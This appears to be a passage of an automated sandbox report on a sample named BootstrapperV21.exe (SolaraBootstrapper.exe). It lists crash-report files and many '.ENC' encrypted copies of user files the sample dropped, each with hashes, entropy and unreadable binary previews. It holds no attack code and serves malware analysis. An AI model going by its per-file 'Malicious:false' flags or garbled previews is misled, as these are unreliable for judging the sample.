                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.1.2.9.5.4.1.9.4.8.1.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.1.2.9.5.4.9.9.1.6.8.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.a.e.1.9.2.3.-.2.a.a.b.-.4.7.b.a.-.a.2.d.d.-.a.5.4.3.1.1.f.7.5.1.0.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.9.a.4.e.e.2.-.f.a.3.5.-.4.b.2.6.-.a.7.2.3.-.a.6.9.c.4.8.1.a.0.5.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r.V.1...2.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.0.-.0.0.0.1.-.0.0.1.4.-.5.7.7.7.-.0.1.9.c.9.2.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.2.1.f.2.3.2.c.2.f.d.8.1.3.2.f.8.6.7.7.e.5.3.2.5.8.5.6.2.a.d.9.8.b.4.5.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF666.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 16 streams, Sun Oct 13 17:09:14 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):606682
                                                                                        Entropy (8bit):3.295705782428262
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:dDYg4Dqg3jpExX3Qi+9hRqQSqGFGX9yUI:cqgQQtRqmGFG
                                                                                        MD5:39B68CBF0A5CE7BED9F3F916B2A11B88
                                                                                        SHA1:628B39E4F2AA6BD2D13B98ED9F891FC51EE3EE10
                                                                                        SHA-256:900E594A188F4A4EB46898B0789AC391384190D600E34901C01EA170CCEE7956
                                                                                        SHA-512:2A3C59BC845A6D399B08CBB5EDBA569F833559953DB12B720A790C2D7DB35A78E54B58292CED2E38476E63505F788135B402E745F96F37F8BA4AD7EBF54890A0
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... ..........g............4...........<...T.......<....)...........)......DT..d...........l.......8...........T...........PV...............E..........xG..............................................................................eJ.......H......Lw......................T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF83B.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6808
                                                                                        Entropy (8bit):3.7151343954597613
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJ4wZ/Po56YZE8/pr089b/Qtfin1m:R6lXJ3Z/P06YG4/qf/
                                                                                        MD5:D639C61FF1D2FD95AA5E90AD30A13A42
                                                                                        SHA1:1CB7428481353CE24997ADB0849FEC00022222A5
                                                                                        SHA-256:23CBE6243BE576CF8D492CABB39E911855AAE127571843FD12009C44C208747A
                                                                                        SHA-512:4986B7B647CD10D1BFF1AD354499A1FA5DBE0DE1587A94AAAE9A0279FE6B875F75D66C51EC7361C732B793BD568845FAF91BE9715F1B4D1CADA38077B24A36A2
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.7.6.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF87B.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4834
                                                                                        Entropy (8bit):4.464200840487415
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zslJg771I9ylWpW8VYAYm8M4JQDCT/Foyq8vaCToJe1yioird:uIjf/I75U7V8JKW0k1vdrd
                                                                                        MD5:E7A382D0D36ACB8D1206526CB807342F
                                                                                        SHA1:B5C6AA1EF6E5DB5CCA0FC5586CA8452C68AA8953
                                                                                        SHA-256:804B240C0273881901789A736E1DFC09AB992C70B9B7A70C27E508F91A8FC11C
                                                                                        SHA-512:42A48E0CCDEC26B6596C0A22CAACC9F7794FA80D50818D86FD54771E8793EA3B8370B6D0B390E79BFAACA8BE7E497702A599541704EF0C9678C0F9F53353E7BB
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="541931" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\Users\user\.curlrc.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):4.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rDahRyb:X7b
                                                                                        MD5:BAE85163D03C0620A91B92790F631FA7
                                                                                        SHA1:21BDA19513E900C700056EE7815964B99BB4B7FB
                                                                                        SHA-256:3B70004C98E65164AB262C3F10691F03A1B0A6DDA6B7E2BDC3644BBE16A042DE
                                                                                        SHA-512:F82948D5E1BC968504732113601BC698981B619C44CF14C2278FAA04C6AC5B39D96F5966409D4E8A4E6CE68427D751CB5F0A0F316E741461C0A84DBA6DB60EFE
                                                                                        Malicious:false
                                                                                        Preview:..<...t....WA..

                                                                                        C:\Users\user\3D Objects\desktop.ini.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.32735962678097
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:iWTGns2NLaxNPawz+Rt1UI7QweXgTJmHbPcXWhc9cNnyjh1jmb+y:iWqns2QN9AMI73eeXNoSabD
                                                                                        MD5:3DA9A62DE71115FFB6E3D398F99058AF
                                                                                        SHA1:BCF849A81C5E15569158CFC4D99E85920BCB6607
                                                                                        SHA-256:C96944BBB4CF87CC000E47DDF02600B413F134BD8246B3E9F18456B546ECFB66
                                                                                        SHA-512:87770D4032DEF95DE9E1025E1E1F3348755E36A3422FFD0F6DA58A33E60F8F9AB385BE8966C3909A47A203F0D4B9C60CF0833C5062E5C1516BAD65335B67BAE7
                                                                                        Malicious:false
                                                                                        Preview:. 3..I<m.....v9.....0....Y..WP.O:..d3.<.TuHe..vY.......c.*,.qS.0..).9....)...@f...,..4...&f.7....u...]..;7s....Z#".......|.........@.G..L8Ug.c('R.p.Pd.k.....I{b\YQE#i..+Fg..Y......h..I.|SRo...~1I.SD2:g&!'.p.U..0.K...1.5....&f..V\...U..f.~Kc..e:]#..F.C`........2..8W.y...._a.C3'....L...xRR....5(

                                                                                        C:\Users\user\AppData\Local\.curlrc.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):4.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rDahRyb:X7b
                                                                                        MD5:BAE85163D03C0620A91B92790F631FA7
                                                                                        SHA1:21BDA19513E900C700056EE7815964B99BB4B7FB
                                                                                        SHA-256:3B70004C98E65164AB262C3F10691F03A1B0A6DDA6B7E2BDC3644BBE16A042DE
                                                                                        SHA-512:F82948D5E1BC968504732113601BC698981B619C44CF14C2278FAA04C6AC5B39D96F5966409D4E8A4E6CE68427D751CB5F0A0F316E741461C0A84DBA6DB60EFE
                                                                                        Malicious:false
                                                                                        Preview:..<...t....WA..

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.log.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.875
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:IHqDN92:IG92
                                                                                        MD5:2565D7AECCCC6B4348A2AC92A832D139
                                                                                        SHA1:4910F888F11EB5A037174F44BEBACBB0E9C716A0
                                                                                        SHA-256:F4C801F49CB6A7BA90D7DB65AEB50909352766F322F38FB2BC93378199E237EF
                                                                                        SHA-512:507EDED3D39F310579A7604060D4386C5B89505671BEE1D012FCACA669CF1622AA2B21C0CD46C2E563B535B9F7EC7644264F7A8138E367A67D0D3AF222AD9D22
                                                                                        Malicious:false
                                                                                        Preview:.@.w.D*.3o.i.7

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):4.663909765557392
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:5ssJHQOOsaVI0n:sOOJVI0n
                                                                                        MD5:707AA11AE4BB330C8FF4314ACCAB2D75
                                                                                        SHA1:8C63AAB10596784BFA694B7B38037CC21816F34E
                                                                                        SHA-256:0BCACBFFF916D3547AF4BB7375ACDA894F9885940E91146695E21174B2A5F927
                                                                                        SHA-512:2F0645A35797DDACF1A058B399E4BF3C2FBA61C1C09E874DD6E1C14669C4BB2A12CEB117F72BB5630D73FCF99289DA94E5B36126EEEF73F9D9881968AC50B4E3
                                                                                        Malicious:false
                                                                                        Preview:........W..j..+.....`3.S.W...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8208
                                                                                        Entropy (8bit):7.978974921262276
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:S7CdXQZtoaZdPO4pw0D1H15OwP2WCHsW5:eCdXgma7OOFDL5OFHsE
                                                                                        MD5:10808F1FD8F56B7661A14563CFABDD89
                                                                                        SHA1:7E6D6B08EB688B610A38B3DDA79419C7962EAC98
                                                                                        SHA-256:16A706C494CD0EC5BD7B82EE9BA54568AF36AA617516F6868B1CE613028E40AB
                                                                                        SHA-512:C449D0E36599ED3B667A9AF33FEF3E27AF01CC63EEFF639CD415476573480DC4D80BAFE1EF5A39F53831E43CD68C0CFFF31BF1B284EC5D30156FAD7D561F367A
                                                                                        Malicious:false
                                                                                        Preview:>E....`c@.#H.v_.6o.....iG:...N._y-..EV.N..&.3..G...d..]Fr...!.%)...4..k7....;.$z...d..[.o+....G......j.%.Q[..0....pP..].rc.6M....5{.m...".......~...~...x.5Z$QAw.@.v..-E....n.?+'...6P^..........-......>.. '.........-.,.HD`.{.=...%.K..Z...7{=|Q;}v....Hc..}...J"..PG8.mdi.._[..3...)..#.w..q.c....Y..c:.N.i...M...P.xri>B...s.|,../.<+55..U......e&(...C...y.f.lpBH.PmI.s....o..[|.3..{O.......J&.=..I.@....H..3....]v@6...vglj9..h.2.x.....,..#....I...}.8.b....N.{......W.1.Q{.0....r.y.BH.e~.a.z...|.....59.Sf%%...5.....Bm.$^..#...7.[.<.>...SN.8..u....O.O...A..b....i#......k...i.=C.<.+...zB...g.w..Om..q<.....>$..(...P..X...%..`...^.s.`.mS.&.....~C...$l.......7o.;....`...$...@.>qFI.. ..[.*Zu].K....,...N..;w..B.@.b...m..k.?.<.~....qy*..D.......BQ....l}.K!j.+.....$..+..6Z.{........G.!.S..KysB..J..xyN.h$I#..sWK.`j.u.N'...^]...5..l.....4].....$..|b.4~8m.K.....>...._'.8.c..#.2...............Q..;K5w.2-.._.f..Uu.9%....A.Um..fH...N.d.RU..L._...f...........b.

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):270352
                                                                                        Entropy (8bit):7.999431732758374
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:Eud7bpPqVlROLe6k0fh8taRU1KWhy4iFD8eezxjNJlwNRN3QQj:17lPqF4e6NfhQaRU1zhFS8ey3Jlweg
                                                                                        MD5:7EC19DF760BE1D74F8020640E381D843
                                                                                        SHA1:ECE8E47F0185044E74DAE72829B37743A118FA8E
                                                                                        SHA-256:63D17CD361F8D341736BCAC9C6ED25F503BE67C3F0A382A941A1F0B053738F5A
                                                                                        SHA-512:B5A9C84B3FDF91A53C19981F69033317DA95B8BF30643CB590ABD0455DB4CD96DF1396EA41289274E19127AB370E70EC4EAA55EB42232A5144E8CEA208633D5E
                                                                                        Malicious:false
                                                                                        Preview:?.hW.....Md...r....1B.JC.-B.)B..1`....Z?.....wF.5.F.....R....2....5.%....ID)...q.0..t.....9..E...bq..3vS.I.....*..p.1.V.....*../f..g.J.+..r..0h.k..(.:.D2b.g...o@.P....w~...oY^...M;..k...2.+...T....7..r.=V.A.k.......X..h.0...-.Di..`..?25......`r..._(.A.. ...r.A...".;......b..1..&..N...1..y..j9........&..'.w..Q.|......A.aH.c.e...........u..`-x.)......q..l.(X.#......%+.k.i.o....W...........[.?7%c....h.r......;...Z(LZ@....|..$a-z..Ke.. ...?.z...a..1.~.W+lI.^./M.....=.........K..v...{cq.S.^[.x1..g...3i.......-.O.?..KX....L.m...3..7i..U.8....b?......r....`@.4#kS.....l....M.E...,H+.b_...6j...z....$>`...yD.....I..7sz',...............2w..l..}....rDob.(..{eD5Q.1y..T6cT...:..UqJ.yR.!.(..'l8<\..FX.5._..;&.v.W...=...%Jue@.@.zF.....t...wM.Z.Q...........:....."A.^.N.._)..x-...q.2.fM..b.......#X...H......2.Y.=..}..NJ...(...}S6e.:A....n<...1X8.a....w..........8..9.vo.Zv.3....c...4"f...(...6p.X.P.......nWJ..o.;.V.......?Y.......x.e....h.Zl.Z2..... .

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8208
                                                                                        Entropy (8bit):7.9752526687062275
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ii1kLgoY2Z88b6us5YlIzU9JLzWt0xqGcbpFykcnk:/ars5AIz0JLaqxHUgkcnk
                                                                                        MD5:36F763FA54BF50276704292313BDB93C
                                                                                        SHA1:2DE62450DB3BD863939057076DD0BCCDAC64D66A
                                                                                        SHA-256:6E7B40F371CC34F63308CE60448A537FA82F4C5060925D457D3A80C39D59C92D
                                                                                        SHA-512:A6A9EF1310CC785A9908E4447657F339EA9BA3709F3F3E552EA4257B59103906BA1DC03BBC4564F90CEEEE24CE004E04F3AC66D83D7F0E26E64951C693EC9C34
                                                                                        Malicious:false
                                                                                        Preview:V.^.D....C.WI..i...4..R..6.W.....b(}..2.....'=4.](.../.....]d. ......]....T.f..1n%.i.....5...^..$....D%..%?.O....a...E_.J6.....1../..]...G.....@IK........6..q.^.^x....r.{{r.9...z...$..k.*......H.$....D\&..e..G7[.....-z..r...)...{Ms..N.g...o%po..4..O...2.y{K..P......tg....l."...q.M^K....H ........h...V.Dud.t..)...\.FK..n..E.....e.O..;m.....j.#..._..|s...$<.sS.E%..h.;a.|.j..9..`......=.x.T..K.......$E./.'...~...w.e..Hy..d]G...W....:....q...T.....b._a....".. ..\R.)......50....l;..[.-.....Z....t...a.<.. .B>.!...P...IN...-@..K.*C....E.#..P5.y.,y..L .."...O.7.R&Y.a.?..m...55.1.Q..T).......SR.....L....~0Yb....c.y.E.g..`34.t.&.C:.?...&.g..r.Wh8K.......Q|...'.++.'...D......UA....N.&\2.&....d.{.J...R...c...n.}.M..X...&...d,......$...H....i.#...cb?..s.}a.j.M......=..H...PJv......r..d..:.mItAT..a9......iT ......]Ai.....o.$...?)4.1.[....Mt.b.\..{...q,..Xq..n....>>.7...!.O. .x..X..x.F5uw...F.;$..S.B.O..EK..$a.+.c)|"..+ ..z.!......:e.>....V.O...y.#....

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8208
                                                                                        Entropy (8bit):7.97888061429063
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:Gjt0/WTjCgXCHhsdiQOj1Ulms1yZIEYL/LpjY:syij/6sdixUB1uE18
                                                                                        MD5:FE996A3BF0EE1564FA7D51BFA5614E31
                                                                                        SHA1:44E482583401432553B86E92445474E0AC7AB75C
                                                                                        SHA-256:3326964A5BBF63FF8A0EA9DB13216704EBA9871A2D2E71DA1FE057B339AF3273
                                                                                        SHA-512:F87428310297F44CACA62B02A314D59C4A2BD6B84FE4431381BDB19240D079B4303949A601F1254872A2BDFAB18B7AA176351BB657D2C691D1A2D6C89DB8F6C9
                                                                                        Malicious:false
                                                                                        Preview:...c.N\.....J.....1.....F..;o..M..T.....O.Z.r..... ...1....;8.D..z.....`x.2.....K.t.S..F7,A?].....n$....W....T.q.w .>*.c3...m...i.......]....KB.J...y..%..1O..Y....p~m........Rm/.....Yd3f....-....E~.*....w..U...>.y...\.0....r.).l......^`V.+.]GtM|....#.a-....q.qOY..#.R.yI....H.(.......?.T|..X.0.h@.`...Dj...........PU<.J.....`N..,.I..`.|.R[...$N...)..:..C.^....J....X.\..F..C..........D.b.......?[.d....H....p.8.m..R.f.),../..2......;4CW4...y..13.h\C:...2.6..8....?.{0u3.]|Y.7g....e+...&.....K;X.~g..A....J...<Ph...h........|D.....HI.(.+;..^..(.a.g^...w..+..J_1..n..........n6...+.......!.b.)...9.om...L.8e..........|.13{s.F.......PR...#.....te^.v...H..]..c:....Tga..>B.%..0.Lco/...?...F.....e...d%{.=.....T. ....sM5.e.a.<..o...w...o.6.VM.D(.....x...hhM...i?..NS..ZR...o...~...{7..5+.,.XP..$.G..%b.9.WIv......&..T_m.....I.....6.1.;eC..L..o...",9....`.w.F.f)...*..n.G.3..%.6{.B.o.....Z:..i0G.1*!..n.........*@.T.k.;"GQF.4...I...A........

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):262528
                                                                                        Entropy (8bit):7.999365463350076
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:bexbHbTjARi/SkI80bH/JoqfeuZdzaahEAljEeodlcyX0AIThitA7:SxbHzl/lI80bf6q3XEA9WcOF9K7
                                                                                        MD5:2C3CE4BE9DB19C1F2FCFD94483CB93C4
                                                                                        SHA1:736029C281CE9C589ACAA6A884805E54067FEC13
                                                                                        SHA-256:91BDF659E87B16955FD8DF7234858A95921594D0BBD419771B0FF492555F07A8
                                                                                        SHA-512:2C376A06D5C6923B6D4BEBEFEB844885830A4959182B162937912E33A1CC453186706541636B679AFA68D39E9AFB2D76129E72BB55749E420238044F96C3CDAC
                                                                                        Malicious:false
                                                                                        Preview:..g....W-Q.....d..]t2.J.T......."...R.!m..?.1M.n.....J.f./.Y>..mp..t_...._...v.O....'..}i.*Lp...+.4#.O....f..>.(.nC.1G.S.2.@J.....2.` .....Y...>*2.;....w!.J.~6......z....\G.l.y.w..F......w.;..7.......Q....%.......[.3...W....[...y....~..#....EA..|......e...........V.M............~.........%..?...\...&.Z.6.../s^..b..7.^..j!e..<~..1Q.7..`..~....XO:t.h..A.[P...Rt....Y.\..........:...l..4;?.{.b.w..F....y./.P.?...".I;.......p|...^..W*.y5{...#I..,.....kD.....q.<...0..k..X.U.yCX....y....^....7...m0..(.X...M..X..=..aO[.b..x/...,......4..|.U..().Mx.........=...2/)p.....M...b..0.$.%........vx......p.i..NB7.......`.d...`....R......}..Qy.mm...2.....~..3.B4t..d?.%J..x..>%...P..7..Q...>...{....a.83...B.;s2IZgy.}...IX..<..$.<0)......TY..0"...#.5..=.k..9.mK.9..D.$.....z..U.a.P.6N..2.0.=CQ"....0^a"..k.i_.u.'H.d-..{....(.Aypn;.....%..V.y. ]......6...h.LEMD...9S....?....z._G..L....H@.%.(.......pj....c3.....a!...~..ZK.....2...k...:...j"*.a

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):6.967274272482923
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:1uwWY2zpjY921OpjWPBJnsi/LdgHm4KnMcHMB:ubVjYwJPBJsi6HPPBB
                                                                                        MD5:CF20C040D6D728AE7E42AC7E63C6B51C
                                                                                        SHA1:E5E94FC7E3138124094716DB13F77D26B33F9B37
                                                                                        SHA-256:A1C1D5EB0621BE3C38ED21B55B264D3E3364807AA265A852E45FE7927ADA52B1
                                                                                        SHA-512:B95DE99B96A2121F8488D6F2E5D2E78ADF6BDE1AFD72EF39D57272D239123CB42EE3AE72D6F907A398BE9D671622F0064908148F0DD5197A1119C5BD73CC0517
                                                                                        Malicious:false
                                                                                        Preview:.]....+..l.....?...F......c.5.f..6=]o....."......qe.Vs.._. .z..l1=..N......a....!@.a..9...K...2b7C..!.../.2.bZ.!..Pr.X.].F..b......z...fy.V].aG.{4.....|.>.(...X....C.D...+z....x....G.....e6.<.N.3g.{...g.<......-y.+.c

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):6.9076755214643555
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:aA4VPIvGy1b2lvIJM6RGxWsGCszxd19OOxRN2GUkMlaAB+diit4DsRnJgFxWip0V:aA4uvGy1b2c7OVneIkAa7b4aOuiu
                                                                                        MD5:2DC29AC9E46E8E1E7A1B0F7C14D76590
                                                                                        SHA1:A742CC971B1F7B68D4199D3E47A92773002E1086
                                                                                        SHA-256:341C1645D71BC2D8BA426FA6C70A45BA2A6131ED01699BD0B4CC3D06CBC22B6D
                                                                                        SHA-512:7B00C4B1CBD08574828E7BBD79BCB34A73F808445B39F91AE6DED66BD49FB725E1E39095EF4D87C692C83F0B8F6D8D2A18675CDC54FEA9BF6D39E425BB07BF5A
                                                                                        Malicious:false
                                                                                        Preview:.[..c{%...Q..?...%.?.Fh...9\d<#.....<L:...)...n..kF.k......6/o.cg.......8]M.9..z......a....@!.....P..d?\......QKK..4..H....}$.gjg...*N..>...]b%..T.yG..l7.m_\.._..Yg..5...83.........

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):256
                                                                                        Entropy (8bit):7.157859472504132
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:0QZJFYylzEX2VkOReRm/1o22iHKRQ2CgmLS8NB9la:0UzlzEX2RYRe2RK4QtLtla
                                                                                        MD5:25EF03DD3F49E5BA811B4A10AE600D9B
                                                                                        SHA1:6ED25B3BECE1615673C11ABD774B081DD36AEA85
                                                                                        SHA-256:479F757E64E8F1B5888631FD2A278661E567BD90B0B572F06DCE236A5D7CF5F6
                                                                                        SHA-512:A061CE505BFDA03D02F5B6609828DC540A38704B0303EF558E41FF1A29791C7F9BB76357AD6502670575D9AC4CD3C39B7E58809EB1F67951A1002C0F9BAE16DE
                                                                                        Malicious:false
                                                                                        Preview:.(.B....;.r......#.q..o.5.\.y.d+.A..uB..tgd.QS.......#Y.O..:...LQ..d...A....L....m...H:a....)..P./....4?M(B\.<...4]>iz.'S<..w_..0...}..'...x6Y.....O.R..P._,M....*...x..c..`.../.49'q...N...xe%......0........qNT..NQ.W[T....jS.qsX@....O"..=!._...

                                                                                        C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):224
                                                                                        Entropy (8bit):7.076159806079184
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:umuAhB0V0ajZ/OhyZpiZ4v4yH77OZC2oTIOZik:umusBjWmcSAFUOL
                                                                                        MD5:1FFBA500C0F55753C99A1E24F89BCD82
                                                                                        SHA1:876AB9E1D4EA0C134E95FC441E0984F759A816D7
                                                                                        SHA-256:2C7D1F4FB0A87B17307259B1120048940E158FECDF85ADCD51BEC0F4B6DCA1FF
                                                                                        SHA-512:0009131723032C8A9F30221EE92AE5F825BBE8BE2F21284276B07C7D46B4EC5C6E5473E73F2639616B224E4D2C459A38868E708C687E7CCA3D22502644CE1502
                                                                                        Malicious:false
                                                                                        Preview:.Idr......_.)"%...6.2..eB....8.9.eE1^.&.FG!#...4...a."..R.k...&..u....qk/u>b.u.[.......L..........W.:6..4.....P..k...(.!...K..l.....$.<.]..9"c?/..4|gm.w.0=f>.$..u,...<.ZuA...:.j..d..PH..R......&..-w..S._E..`1/..M

